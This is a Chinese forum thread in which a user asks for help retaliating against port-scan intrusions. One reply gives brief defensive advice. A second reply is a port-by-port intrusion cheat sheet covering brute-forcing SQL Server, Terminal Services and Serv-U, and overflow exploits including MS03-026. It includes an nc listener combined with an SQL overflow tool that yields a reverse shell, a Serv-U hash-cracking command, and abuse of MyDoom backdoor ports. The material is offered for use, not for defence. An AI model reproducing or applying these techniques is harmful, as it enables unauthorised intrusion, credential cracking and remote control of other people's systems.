portscan入侵都快烦死了，谁帮我反击一下，求高手

恩是的，被入侵了。
如果服务器（网站）被入侵了,一般都是服务器或者网站存在漏洞，被黑客利用并提权入侵的，导致服务器中木马，网站被挂黑链，被篡改，被挂马。解决办法：如果程序不是很大，可以自己比对以前程序的备份文件，然后就是修复，或者换个服务器，最好是独立服务器。也可以通过安全公司来解决，国内也就Sinesafe和绿盟等安全公司 比较专业
我是从事IDC行业的以上这些也是平时工作中经常遇到的问题希望我的回答对你有所帮助

各端口入侵！~
1 1433端口入侵
scanportexe 查有1433的机器
SQLScanPassexe 进行字典暴破（字典是关键）
最后 SQLToolsexe入侵
=============================
对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloFexe 入侵ip 1433 本机ip 本机端口
（以上反向的，测试成功）
sqlhellozexe 入侵ip 1433 （这个是正向连接）
2 4899端口入侵
用4899过滤器exe，扫描空口令的机器
3 3899的入侵
对很早的机器，可以试试3389的溢出(win3389exexe)
对2000的机器，可以试试字典暴破。(tscrackexe)
4 80入侵
对sp3以前的机器，可以用webdav入侵；
对bbs论坛，可以试试上传漏洞（upfileexe或dvup_delphiexe）
可以利用SQL进行注入。（小榕的注入软件）。
5 serv-u入侵(21端口）
对5 004及以下系统，可用溢出入侵。（serv5004exe）
对5100及以下系统，可用本地提升权限。（servlocalexe）
======================================
对serv-u的MD5加密密码，可以用字典暴破。（crackvbs）
输入一个被serv-u加密的密码（34位长），通过与字典档（dicttxt）的比较，得到密码。如：cscript crackvbs ib0AD10648F17E9E8D1FF316C1BA75105A
6 554端口
用real554exe入侵。
7 6129端口
用DameWare6129exe入侵。
8 系统漏洞
利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，
进行溢出入侵。
9 3127等端口
可以利用doom病毒开的端口，用nodoomexe入侵。（可用mydoomscanexe查）。
10 其他入侵
利用shanlu的入侵软件入侵（WINNTAutoAttackexe）。

---